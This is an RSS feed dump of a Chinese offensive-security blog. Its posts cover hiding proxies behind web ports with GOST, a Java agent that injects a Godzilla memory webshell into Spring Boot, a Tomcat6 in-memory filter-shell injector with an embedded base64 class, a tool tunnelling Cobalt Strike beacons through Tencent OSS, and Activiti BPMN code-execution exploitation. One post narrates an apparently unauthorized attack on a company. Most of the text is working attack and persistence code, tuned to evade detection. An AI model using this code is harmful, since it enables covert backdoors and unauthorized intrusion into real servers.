2 https://9bie.org/index.php/archives/981/#comments https://9bie.org/index.php/feed/archives/981/
写了篇不太好发出来的 https://9bie.org/index.php/archives/979/ https://9bie.org/index.php/archives/979/ Fri, 16 Jun 2023 22:17:23 +0800 ⑨BIE 有点刑,想看的直接找我要密码
]]>
26 https://9bie.org/index.php/archives/979/#comments https://9bie.org/index.php/feed/archives/979/
不同中间件端口复用代理解决方案 https://9bie.org/index.php/archives/969/ https://9bie.org/index.php/archives/969/ Tue, 28 Feb 2023 14:34:00 +0800 ⑨BIE 前言
frp反弹确实很爽,但是很多时候这B服务器不出网,或者说动不动就被流量设备检测到了
linux下可以使用iptables做端口复用,windows下就没啥办法了。
除非你花一大笔钱找微软买个签名把驱动给签了然后做端口复用,这个土豪的方法我们先不提。
还有一个方法就是使用Neo这种类型的,挺好用的,但是有没有更快一点的方案?
比如。。。websocket?直接长连接?直接做到原生tcp的运行效率?
二话不说,开干!
iptables 端口复用
这里就随口提一下iptables端口复用
如果我们直接请求目标服务器的任意端口,只要能在netstat -anpt里面看到我们的请求IP,我们就能根据这个IP用iptables做一个端口转发
iptables -t nat -A PREROUTING -p tcp -s 我们的IP --dport 目标WEB端口 -j REDIRECT --to-port 转发端口
GOST
原本想动手写的,但是想了想还是不能乱造轮子,于是乎github稍微搜索了一番,愉快的找到了这个工具
项目地址:GOST
我们目标也很简单,就是听个websocket的代理,然后使用各种中间件中转,最后用本地代理,设置级联就行
项目里的功能正好符合我们的需要,我们只需要在远程服务器上,运行
gost -L ws://:7000
然后在中间件各种配置,最后在我们本地使用
gost -L=:8080 -F=ws://远程web地址:远程web端口
就可以使用web端口复用走Web的,长连接的,websocket的代理了
Nginx中间件配置
nginx的配置挺简单的,一个端口转发就行
location /ws {
proxy_redirect off;
proxy_pass http://ws监听ip:本地ws监听代理;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $http_host;
proxy_read_timeout 300s;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
Nginx有个好,就是有热重载功能,直接一句nginx -s reload就行,至少不怕炸原本的业务
Apache
Apache修改的就有点多了, 得给配置文件添加模块引用。然而唯一有点安慰的就是,这玩意的模块是自带的。
先引用模块,有两个方案,直接用命令
sudo a2enmod proxy proxy_http proxy_ajp proxy_balancer mod_proxy_wstunnel.so
或者直接在你的conf里面添加,把上面这些模块都加进去
LoadModule proxy_module /usr/lib/apache2/modules/mod_proxy.so # 填写apache模块的绝对路径
....
然后写入代码
ProxyPass /ws ws://127.0.0.1:7000/ws
最后再service apache2 reload就行
IIS
windows就不大一样了,可以图形化点点点,也能命令行,啊,但是命令行操作我不会.jpg
应该可以用powershell解决,但是windows上其实非常滴麻烦,因为要手动安装两个模块,并不自带
所以推荐还是Neo或者IIS插件后门,除非你觉得管理员水平实在太差。
首先是启用Websocket,打开控制面板,启用或删除windows功能
1.jpg
1.jpg
选上Websocket
2.jpg
2.jpg
接下来就是安装ARR和URL REWRITE
安装ARR:application-request-routing
安装URL REWRITE:url-rewrite
然后配置ARR
3.jpg
3.jpg
4.jpg
4.jpg
5.jpg
5.jpg
点击启用就行
然后配置一个URL转发,找到你的项目吃,点击URL重写
6.jpg
6.jpg
咱们也不需要什么通配符,直接完全匹配GOST的ws就行
7.jpg
7.jpg
其他中间件
原理基本就是配一个websocket转发,大差不差
进阶
上面的ws全部应该都可以改成MWS,我看gost是支持多路复用的,虽然不知道实际提升有多大,但是听起来很牛逼,那就当它很牛逼就好了
还有一个就是ws的通讯协议没加密,可以考虑升级WSS,但是WSS配置又会遇到很多很麻烦的东西。最典型的就是证书啊证书啊证书啊。
还有一个就是gost的ws默认监听路由也得改一改,流量特征太大了。这些后续都要自己处理一下,避免实战中被发现。
]]>
0 https://9bie.org/index.php/archives/969/#comments https://9bie.org/index.php/feed/archives/969/
SprintBoot获取Context的一些方法&&agent外部注入哥斯拉内存马 https://9bie.org/index.php/archives/967/ https://9bie.org/index.php/archives/967/ Fri, 24 Feb 2023 03:22:37 +0800 ⑨BIE 前言
内存马高级,文明,实体马粗鄙,弟弟。
所以感觉现在能打内存马基本都是直接打内存马了,但是有时候,我们拿下springboot,是通过一些其他方式拿下的,并不是通过web的代码执行。
这时候,我们想做一个后门,常规正向后门又因为目标大多是内网环境访问不到,反弹后门流量又太大,而且这些后门可能还会留下实体文件,端口复用又需要root,而且有概率打炸。灵车率十分的高,所以我们最好的目光就是再springboot打一个内存马,文件不落地,正向连接隐蔽性高。
所以打内存马的目标十分简单,归根结底就是在进程中执行我们的jvav代码,然后打上注册上路由绑定上内存马。
打内存马的方案
如何在进程中执行任意代码?最简单的办法就是注入,然后java是虚拟机,它十分贴心的提供了一套native接口供我们调用,推荐一个工具:jattach
用这玩意大概原理可以直接注入进内存,很贴心的帮我们调用了java native api,然后打入我们的agent。
使用方式就直接jattach.exe pid load instrument false 'agent路径'
那么我们第一个目标就是制作一个agent
制作agent
agent我们主要就是当成一个有特殊入口点的DLL就行,agent主要在于premain,agentmain等这些函数,这些函数网络上介绍的已经很详细了,我们这里就不再赘述,我们直接看向agentmain,这个作用主要是虚拟机加载完之后会调用这个函数。
同时,我们修改MANIFSET.MF文件,添加一个Agent-Class 指向我们的入口点类
完整模板如下
//META-INF/MANIFSET.MF
Manifest-Version: 1.0
Created-By: 18.0.1 (Oracle Corporation)
Premain-Class: com.bie.agent
Agent-Class: com.bie.agent
Can-Redefine-Classes: true
Can-Retransform-Classes: true
package com.bie
public class agent {
public static void agentmain(String agentOps, Instrumentation inst) throws UnmodifiableClassException, IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
}
}
接下来,我们再其中添加代码执行的函数,一般运行内存马的时候,是直接使用Thread.currentThread().getContextClassLoader(),来加载我们的class,在web中可以使用,但是在这里不行
因为在web中运行时,我们当前的Thread已经包含了所需要的上下文已经环境变量,所以接下来打入内存马时候才能把我们的内存马添加到路由管理里,一般这个线程名字在tomcat和springboot中是叫做xxx-EXEC-一个数字,但是此时我们是注入进去的,线程中并不包含这些信息,所以我们就得另辟蹊径。
既然这个线程没有,那么我们直接枚举过去不就行了?反正java中try这个东西实在是好用,能成就能成,不能成用try兜住反正也不会炸。
于是乎,我们的代码就可以这样写
Method m = Thread.class.getDeclaredMethod("getThreads");
m.setAccessible(true);
Thread[] threads = (Thread[])((Thread[])m.invoke((Object)null));
for(int i = 0;i<threads.length;i++){
try {
byte[] var2 = (new BASE64Decoder()).decodeBuffer("你的内存马base64");
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass",String.class,byte[].class,int.class,int.class);
defineClass.setAccessible(true);
Class Evil = (Class) defineClass.invoke(threads[i].getContextClassLoader(), "EvilGodlliza", var2, 0, var2.length);
Constructor constructor = Evil.getDeclaredConstructor( int.class);//这里要设置和析构函数的参数一样,我们Eval里只有一个int所以就设置成int
constructor.setAccessible(true);
constructor.newInstance(111);
} catch (Exception var4) {
var4.printStackTrace(ps);
}
}
直接通过循环所有线程,暴力加载,反正只要在内存里,总有一个是可以成的
内存马部分
总而言之言而总之,就是内存马,详细可以参考我之前写的SpringBoot 内存马 && SPEL注入内存马
不同的就是想办法把哥斯拉扣出来,不过这种基本都是小菜一桩,把jsp的request和response和session换成springboot的就完事了,我们主要是要处理Context获取,不同版本获取Context的方法都各不相同。于是乎我总结了一些直接获取Context的方法
org.springframework.web.context.WebApplicationContext context = null;
try{
java.lang.reflect.Field filed = Class.forName("org.springframework.context.support.LiveBeansView").getDeclaredField("applicationContexts");
filed.setAccessible(true);
context =(org.springframework.web.context.WebApplicationContext) ((java.util.LinkedHashSet)filed.get(null)).iterator().next();
}catch (Exception exx){
exx.printStackTrace(ps);
}
if (context == null){
try {
context = (ServletWebServerApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
}catch (Exception exx){
exx.printStackTrace(ps);
}
}
if (context == null){
try {
context = WebApplicationContextUtils.getWebApplicationContext(RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest()).getServletContext());
}catch (Exception exx){
exx.printStackTrace(ps);
}
}
if (context == null){
try {
context = ContextLoader.getCurrentWebApplicationContext();
}catch (Exception exx){
exx.printStackTrace(ps);
}
}
if (context == null){
try {
context = RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest());
}catch (Exception exx){
exx.printStackTrace(ps);
}
}
直接套上就能用,然后就是规规矩矩的加路由
RequestMappingHandlerMapping requestMappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
field.setAccessible(true);
java.util.ArrayList<Object> adaptedInterceptors = (java.util.ArrayList<Object>) field.get(requestMappingHandlerMapping);
EvilGodlliza vulInterceptor = new EvilGodlliza( 0);
adaptedInterceptors.add(vulInterceptor);
out.write("ojbk");
out.close();
合起来大概就能用了
另外一个思路
其实再agent中,我们不只可以用这个方法,还有一个方法是通过jvm虚拟机api,直接修改native字节码,这个太晚了,明天再写,咕咕咕
]]>
1 https://9bie.org/index.php/archives/967/#comments https://9bie.org/index.php/feed/archives/967/
年末总结-2022印象最深的一件事 https://9bie.org/index.php/archives/966/ https://9bie.org/index.php/archives/966/ Fri, 06 Jan 2023 14:25:27 +0800 ⑨BIE 前言
没有前言,好久没写文章了,先说说最近干了什么吧,算是2022年印象最深的一件事了。
年末的时候,闲着无聊,想着随手日一个,这个企业有点难搞,毕竟有一个专门团队维护,人数还挺多。
然后就发生了以下事情
打点进入一套另外的系统,获取到部分账户信息。
成功登录本次目标->打不死
互联网开始找同源码站点->干死了
源码tmd加密了,sg11,500M文件解不开
开始搞开发商
申请试用系统,拿到一套有管理员站点的测试站
黑盒搞死开发商给的测试站,源码妹加密,不用打开发商了
开审,它们授权文件是个php,在web目录外,然后使用include加载的
审到一个反序列化,发现是nnnnnday
phpggc直接冲guhttpz,任意代码执行被修了,不让运行
但是guhttp的文件写入链还没修,成功任意文件写入
尝试写web目录失败,妹有权限
转换思路,挖个sql注入直接登录管理员用测试站的方法打死or找个任意文件读取读取到原本授权文件然后用任意文件写干死
开始试图挖任意文件读取
代码写得挺安全的,文件上传都过滤了
但是在填写类似周报的地方,他ajax,向upload.php请求数据,会返回json,里面有tmp的文件名
然后周报获取到的地方妹有过滤这个tmp文件名导致目录穿越
然后发布文章,上传的附件就会变成我们目录穿越的附件
利用目录穿越下载授权文件
然后就是等待一个好时机,使用任意文件写把带后门的授权文件用反序列化写上去,这套站就可以死啦
以上是测试poc的时候新路历程
然后,我把发布的文章删除了
然后,站就炸了
倒在黎明的前夕。
原因是写文章那里软连接了附件。。我修改到连接授权文件,然后我把周报一删,tmd它会把附件一起删了,然后授权文件也一起删了。
然后成功宣告,我挖供了半天,挖了一周半,并且还成功挖到洞的站。
被我自己给弄没了。啊啊啊啊啊啊
果然新冠会影响智商,以前我不信,现在我信了。
啊啊啊啊啊
总结
毕业了,成为打工仔。没了。
一年话比一年少。
2023目标:活着
]]>
4 https://9bie.org/index.php/archives/966/#comments https://9bie.org/index.php/feed/archives/966/
oss-stinger/腾讯云OSS上线工具 https://9bie.org/index.php/archives/961/ https://9bie.org/index.php/archives/961/ Sat, 26 Nov 2022 21:55:00 +0800 ⑨BIE 前言
项目地址:9bie/oss-stinger
前有云函数,域前置,辣么现在当然也要整个oss上线辣。然而实际整出来,优势也没想象中的辣么大,可能唯一优点就是部署方便?
原理很简单,直接就是一个http中继,本地起一个http,然后把cs的上线地址设置为本地,然后另外一头,再服务器部署一个获取器,把oss上客户端发来的http请求下载回来,转发给cs服务器,然后拿到cs服务器的请求,再转发到oss上给客户端,然后客户端再转发给cs beacon,就完事了。
如何使用
.\oss-stinger.exe
-address string
监听地址或者目标地址,格式:127.0.0.1:8080
-id string
输入你的腾讯云SecretID
-key string
输入你的腾讯云SecretKey
-mode string
client/server 二选一
-url string
输入你腾讯云OSS桶的url地址
首先,现在cs生成一个http的listen,并把host都改成127.0.0.1,然后生成木马
1.jpg
1.jpg
然后再把Host改会公网IP(这步很重要)
然后去腾讯云,申请一个oss桶。拿到URL
2.jpg
2.jpg
然后再去 https://console.cloud.tencent.com/cam/capi 拿到SecretKey和SecretID。
然后就可以使用我们的工具了,先在客户机上起一个转发器,使用命令
oss-stinger.exe -mode client -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey
然后服务器运行
oss-stinger.exe -mode server -url oss桶的url地址 -address 127.0.0.1:端口 -id 腾讯云SecretID -key 腾讯云SecretKey
然后在客户机双击你的木马,就能上线了
3.jpg
3.jpg
]]>
0 https://9bie.org/index.php/archives/961/#comments https://9bie.org/index.php/feed/archives/961/
Tomcat6 注入内存马 https://9bie.org/index.php/archives/960/ https://9bie.org/index.php/archives/960/ Fri, 04 Nov 2022 20:25:23 +0800 ⑨BIE 前言
和大哥们学新的姿势,感觉自己已经变成idea的性状了,这里的大哥说话又好听,我超喜欢这里的.jpg
以下是参考(抄袭)文章列表
怎么说呢,这几周玩了下java,大概也有点感觉了,打内存马就和win32寻址一样。
首先先解决在哪里打,也就是获取上下文standardContext,在栈上寻址找到这个地址,哦不对,在java中应该叫做对象。
然后再基于这个对象派生,找到管理filter的这些列表,正常程序流程访问网页肯定是先检查一个filter列表,看看是否匹配,匹配就丢给filter处理,然后filter处理完再往下丢给servlet/controller这些处理。我们要做的就是找到那个filter列表的地址,然后想办法把我们的内存马加进去
怎么加呢?那肯定就是得先找到注册函数,把我们内存马注册成一个filter,依旧是从栈上派生出来,还是一个寻址问题。总体感觉jvav大差不差,还是能理解的。
当然,理解是一回事,真的要我写一套完整项目,那就是另一回事了.jpg
注意点
线程加载问题
加载Filter Class的时候,不能用系统ClassLoader,得用当前线程的Loader,不然会报找不到org.servlet.Filter
Method defineClass =
ClassLoader.class.getDeclaredMethod("defineClass",byte[].class,int.class,int.class);defineClass.setAccessible(true);
byte[] code = {};
Class filter = (Class)defineClass.invoke(Thread.currentThread().getContextClassLoader(),code,0,code.length);
Object testFilter = filter.newInstance();
得用Thread.currentThread().getContextClassLoader(),不能用ClassLoader.getSystemClassLoader(),MD就被这个坑了一天。
同样还是线程加载问题
如果类似注入点的地方获取不到线程,或者是由其他线程创建的,比如如果在tomcat的Servlet中用ClassLoader.getSystemClassLoader()加载class(没错我就是这么干的),可以考虑用反射
Class<?> FilterDefClass =
Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.deploy.FilterDef");
Object filterDef = FilterDefClass.newInstance();
的方式强行加载,虽然没啥用。。但是之前被卡在线程那里太久了导致我把这些加载不到的都换成了
完整代码
运行流程,东抄抄西抄抄,先从利用shiro反序列化注入冰蝎内存马把Tomcat678抄出来,然后再从tomcat6、7、8、9内存马把注入流程抄出来,然后缝合一下,就好了
先把Filter代码打包成class
package com;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import javax.servlet.*;
public class testFilter implements Filter{
public testFilter() {
}
@Override
public void init(FilterConfig filterConfig) throws ServletException {
}
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws ServletException, IOException {
if (servletRequest.getParameter("cmd") != null){
servletResponse.getWriter().write("Inject OK!");
}
filterChain.doFilter(servletRequest,servletResponse);
}
@Override
public void destroy() {
}
}
然后编译注入器代码
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Properties;
public class TomcatMemShellInject {
String uri;
String serverName;
Object standardContext;
public static byte[] base64Decode(String str) throws Exception {
Class clazz;
try {
clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception var3) {
clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke((Object) null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
private final static String filterName = "TomcatMemShellInject";
public byte[] getContent(String filePath) throws IOException {
File file = new File(filePath);
long fileSize = file.length();
if (fileSize > Integer.MAX_VALUE) {
System.out.println("file too big...");
return null;
}
FileInputStream fi = new FileInputStream(file);
byte[] buffer = new byte[(int) fileSize];
int offset = 0;
int numRead = 0;
while (offset < buffer.length
&& (numRead = fi.read(buffer, offset, buffer.length - offset)) >= 0) {
offset += numRead;
}
// 确保所有数据均被读取
if (offset != buffer.length) {
throw new IOException("Could not completely read file "
+ file.getName());
}
fi.close();
return buffer;
}
public TomcatMemShellInject() throws NoSuchFieldException, IllegalAccessException, NoSuchMethodException, InvocationTargetException, InstantiationException, ClassNotFoundException, IOException {
Tomcat678();
try {
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
String result = "yv66vgAAADIATAoADAAoCQApACoIABsKACsALAgALQsALgAvCwAwADEIADIKADMANAsANQA2BwA3BwA4BwA5AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABBMY29tL3Rlc3RGaWx0ZXI7AQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAAxmaWx0ZXJDb25maWcBABxMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7AQAKRXhjZXB0aW9ucwcAOgEACGRvRmlsdGVyAQBbKExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjspVgEADnNlcnZsZXRSZXF1ZXN0AQAeTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7AQAPc2VydmxldFJlc3BvbnNlAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEAC2ZpbHRlckNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47AQANU3RhY2tNYXBUYWJsZQcAOwEAB2Rlc3Ryb3kBAApTb3VyY2VGaWxlAQAkdGVzdEZpbHRlci5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAOAA8HADwMAD0APgcAPwwAQABBAQADY21kBwBCDABDAEQHAEUMAEYARwEACkluamVjdCBPSyEHAEgMAEkAQQcASgwAGwBLAQAOY29tL3Rlc3RGaWx0ZXIBABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YXgvc2VydmxldC9GaWx0ZXIBAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAcamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdAEADGdldFBhcmFtZXRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAE2phdmEvaW8vUHJpbnRXcml0ZXIBAAV3cml0ZQEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BAEAoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOylWACEACwAMAAEADQAAAAQAAQAOAA8AAQAQAAAAMwABAAEAAAAFKrcAAbEAAAACABEAAAAKAAIAAAAJAAQACgASAAAADAABAAAABQATABQAAAABABUAFgACABAAAAA1AAAAAgAAAAGxAAAAAgARAAAABgABAAAADwASAAAAFgACAAAAAQATABQAAAAAAAEAFwAYAAEAGQAAAAQAAQAaAAEAGwAcAAIAEAAAAI0AAwAEAAAAKLIAAhIDtgAEKxIFuQAGAgDGAA8suQAHAQASCLYACbEtKyy5AAoDALEAAAADABEAAAAaAAYAAAATAAgAFAATABUAHgAWAB8AGAAnABkAEgAAACoABAAAACgAEwAUAAAAAAAoAB0AHgABAAAAKAAfACAAAgAAACgAIQAiAAMAIwAAAAMAAR8AGQAAAAYAAgAaACQAAQAlAA8AAQAQAAAAKwAAAAEAAAABsQAAAAIAEQAAAAYAAQAAABwAEgAAAAwAAQAAAAEAEwAUAAAAAQAmAAAAAgAn";
byte[] code = base64Decode(result);
;
Class filter = (Class) defineClass.invoke(Thread.currentThread().getContextClassLoader(), code, 0, code.length);
Object testFilter = filter.newInstance();
Class<?> FilterDefClass = Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.deploy.FilterDef");
Object filterDef = FilterDefClass.newInstance();
FilterDefClass.getMethod("setFilterName", String.class).invoke(filterDef, filterName);
Method addFilterDef = standardContext.getClass().getMethod("addFilterDef", FilterDefClass);
addFilterDef.invoke(standardContext, filterDef);
filterDef.getClass().getMethod("setFilterClass", String.class).invoke(filterDef, testFilter.getClass().getName());
Class<?> FilterMapClass = Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.deploy.FilterMap");
Object filterMap = FilterMapClass.getConstructor(new Class[]{}).newInstance();
String setFilterName = (String) FilterDefClass.getMethod("getFilterName").invoke(filterDef);
FilterMapClass.getMethod("setFilterName", String.class).invoke(filterMap, setFilterName);
FilterMapClass.getMethod("setDispatcher", String.class).invoke(filterMap, "REQUEST");
FilterMapClass.getMethod("addURLPattern", String.class).invoke(filterMap, "/*");
Method addFilterMap = standardContext.getClass().getDeclaredMethod("addFilterMap", FilterMapClass);
addFilterMap.invoke(standardContext, filterMap);
Object tmpFilterDef = FilterDefClass.newInstance();
FilterDefClass.getMethod("setFilterClass", String.class).invoke(tmpFilterDef, "org.apache.catalina.ssi.SSIFilter");
FilterDefClass.getMethod("setFilterName", String.class).invoke(tmpFilterDef, filterName);
Class<?> ContextClass = Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.Context");
Class<?> applicationFilterConfigClass = Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.core.ApplicationFilterConfig");
Constructor<?> applicationFilterConfigConstructor = applicationFilterConfigClass.getDeclaredConstructor(ContextClass, FilterDefClass);
applicationFilterConfigConstructor.setAccessible(true);
Properties properties = new Properties();
properties.put("org.apache.catalina.ssi.SSIFilter", "123");
Field restrictedFiltersField = applicationFilterConfigClass.getDeclaredField("restrictedFilters");
restrictedFiltersField.setAccessible(true);
restrictedFiltersField.set(null, properties);
Object filterConfig = applicationFilterConfigConstructor.newInstance(standardContext, tmpFilterDef);
Field filterField = filterConfig.getClass().getDeclaredField("filter");
filterField.setAccessible(true);
filterField.set(filterConfig, testFilter);
Field filterDefField = filterConfig.getClass().getDeclaredField("filterDef");
filterDefField.setAccessible(true);
filterDefField.set(filterConfig, filterDef);
Class<?> StandardContextClass = Thread.currentThread().getContextClassLoader().loadClass("org.apache.catalina.core.StandardContext");
Field filterConfigsField = StandardContextClass.getDeclaredField("filterConfigs");
filterConfigsField.setAccessible(true);
HashMap filterConfigs = (HashMap) filterConfigsField.get(standardContext);
filterConfigs.put(filterName, filterConfig);
filterConfigsField.set(standardContext, filterConfigs);
System.out.println("Inject OK");
} catch (NoSuchMethodException ex) {
ex.printStackTrace();
} catch (IllegalAccessException ex) {
ex.printStackTrace();
} catch (InvocationTargetException ex) {
ex.printStackTrace();
} catch (InstantiationException ex) {
ex.printStackTrace();
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public Object getField(Object object, String fieldName) {
Field declaredField;
Class clazz = object.getClass();
while (clazz != Object.class) {
try {
declaredField = clazz.getDeclaredField(fieldName);
declaredField.setAccessible(true);
return declaredField.get(object);
} catch (Exception e) {
// field不存在,错误不抛出,测试时可以抛出
}
clazz = clazz.getSuperclass();
}
return null;
}
public void getStandardContext() {
Thread[] threads = (Thread[]) this.getField(Thread.currentThread().getThreadGroup(), "threads");
Object object;
for (Thread thread : threads) {
if (thread == null) {
continue;
}
// 过滤掉不相关的线程
if (!thread.getName().contains("StandardEngine")) {
continue;
}
Object target = this.getField(thread, "target");
if (target == null) {
continue;
}
HashMap children;
try {
children = (HashMap) getField(getField(target, "this$0"), "children");
//org.apache.catalina.core.StandardHost standardHost = (org.apache.catalina.core.StandardHost) children.get(this.serverName);
children = (HashMap) getField(children.get(this.serverName), "children");
Iterator iterator = children.keySet().iterator();
while (iterator.hasNext()) {
String contextKey = (String) iterator.next();
if (!(this.uri.startsWith(contextKey))) {
continue;
}
// /spring_mvc/home/index startsWith /spring_mvc
//StandardContext standardContext = children.get(contextKey);
System.out.println(children.get(contextKey).getClass().getName());
this.standardContext = children.get(contextKey);
System.out.println("here");
// 添加内存马
return;
}
} catch (Exception e) {
continue;
}
if (children == null) {
continue;
}
}
}
public void Tomcat678() {
Thread[] threads = (Thread[]) this.getField(Thread.currentThread().getThreadGroup(), "threads");
Object object;
for (Thread thread : threads) {
if (thread == null) {
continue;
}
if (thread.getName().contains("exec")) {
continue;
}
Object target = this.getField(thread, "target");
if (!(target instanceof Runnable)) {
continue;
}
try {
object = getField(getField(getField(target, "this$0"), "handler"), "global");
} catch (Exception e) {
continue;
}
if (object == null) {
continue;
}
java.util.ArrayList processors = (java.util.ArrayList) getField(object, "processors");
Iterator iterator = processors.iterator();
while (iterator.hasNext()) {
Object next = iterator.next();
Object req = getField(next, "req");
Object serverPort = getField(req, "serverPort");
if (serverPort.equals(-1)) {
continue;
}
// 不是对应的请求时,serverPort = -1
System.out.println(getField(req, "serverNameMB").getClass().getName());
//org.apache.tomcat.util.buf.MessageBytes serverNameMB = (org.apache.tomcat.util.buf.MessageBytes) getField(req, "serverNameMB");
this.serverName = (String) getField(getField(req, "serverNameMB"), "strValue");
if (this.serverName == null) {
this.serverName = getField(req, "serverNameMB").toString();
}
// if (this.serverName == null){
// this.serverName = serverNameMB.getString();
// }
//org.apache.tomcat.util.buf.MessageBytes uriMB = (org.apache.tomcat.util.buf.MessageBytes) getField(req, "decodedUriMB");
this.uri = (String) getField(getField(req, "decodedUriMB"), "strValue");
if (this.uri == null) {
this.uri = getField(req, "decodedUriMB").toString();
}
// if (this.uri == null){
// this.uri = uriMB.getString();
// }
this.getStandardContext();
return;
}
}
}
}
]]>
0 https://9bie.org/index.php/archives/960/#comments https://9bie.org/index.php/feed/archives/960/
Activiti/Workflow/bpmn 引擎代码执行问题 https://9bie.org/index.php/archives/954/ https://9bie.org/index.php/archives/954/ Fri, 04 Nov 2022 17:10:00 +0800 ⑨BIE 前言
正好实战遇到几次了,发出来记录一下
直接先上参考文献:Activiti BPMN流程引擎使用不当导致的相关RCE问题
代码也直接参考这个就行。
一般我们只需要留意后台中是否有关键字,比如流程图。workflow之类的,或者查看返回包中的json
比如:
1.jpg
1.jpg
再比如:
2.jpg
2.jpg
我们只要确定我们能修改模型和部署模型的权限就成。
或者留意前端请求,长得像这样
3.jpg
3.jpg
落实到前端就是长得像这样:
4.png
4.png
只要这套站是java,并且我们有权限修改模型。
一般模型形式都是长得像这样
{
"resourceId": "eb39ae1e2dd14910a165323fdcfd807e",
"properties": {
"process_id": "test",
"name": "rwar",
"documentation": "",
"process_author": "",
"process_version": "2",
"process_namespace": "archive_od",
"executionlisteners": [],
.....
}
或者是 在前端直接传输bpmn
4.jpg
4.jpg
这种的我们都能直接打。xml的话可以直接传xml,json的话可以用以下代码,转换为json
byte[] b = "bpmn xml bytes";
InputStream bpmnStream = new ByteArrayInputStream(b);// 获取bpmn2.0规范的xml
XMLInputFactory xif = XMLInputFactory.newInstance();
InputStreamReader in = new InputStreamReader(bpmnStream, "UTF-8");
XMLStreamReader xtr = xif.createXMLStreamReader(in);
// 然后转为bpmnModel
BpmnModel bpmnModel = new BpmnXMLConverter().convertToBpmnModel(xtr);
// bpmnModel转json
BpmnJsonConverter converter = new BpmnJsonConverter();
com.fasterxml.jackson.databind.node.ObjectNode editorJsonNode = converter.convertToJson(bpmnModel);
System.out.println(editorJsonNode);
然后就可以调用class或者是EL代码直接执行了
后端审计
如果我们拿到的是一套代码如何快速发现利用点呢?
我们只需要三个条件
• 注入模型可控
• 能获取到启动条件
• 启动条件可控
三个却一不可,少一个都跑不起来,落实到代码就是,this.repositoryService.saveModel的参数是否可控,能否获取到processDefinitionId的值,或者不用这个值,取决于代码运行时候要求的内容,还有就是最后的this.runtimeService能否运行我们的模型
对于Activiti BPMN流程引擎使用不当导致的相关RCE问题中给了个例子。
runtimeService.startProcessInstanceByKey("hireProcessWithJpa", vars);
其中的hireProcessWithJpakey就是对应的bpmn的key,但是实际情况可能并不会使用startProcessInstanceByKey。
一个比较经典的情况就是
ProcessInstanceBuilder processInstanceBuilder = this.runtimeService.createProcessInstanceBuilder();
if (processDefinitionId != null) {
processInstanceBuilder.processDefinitionId(processDefinitionId);
}
if (startVariables != null) {
processInstanceBuilder.variables(startVariables);
}
ProcessInstance instance = processInstanceBuilder.start();
这段代码就是根据processDefinitionId来启动流程,所以对于不通的代码我们要落实不同的方法,但是一般只要盯着this.runtimeService看就行
然后下次遇到这些,就能愉快的日下来辣
]]>
0 https://9bie.org/index.php/archives/954/#comments https://9bie.org/index.php/feed/archives/954/
|
__label__pos
| 0.512642 |
